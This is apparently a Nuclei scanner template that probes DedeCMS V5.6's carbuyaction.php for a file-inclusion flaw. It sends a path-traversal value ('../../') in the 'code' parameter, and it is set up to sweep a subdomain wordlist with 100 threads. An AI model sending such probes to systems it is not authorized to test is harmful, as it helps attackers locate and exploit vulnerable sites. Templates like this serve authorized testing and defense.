id: dedecms-carbuyaction-fileinclude

info:
  name: DedeCmsV5.6 Carbuyaction Fileinclude
  author: pikpikcu
  severity: high
  reference: https://www.cnblogs.com/milantgh/p/3615986.html
  tags: dedecms

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Cookie: code=cod
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Cod::respond()"
        part: body
        condition: and

      - type: status
        status:
          - 200
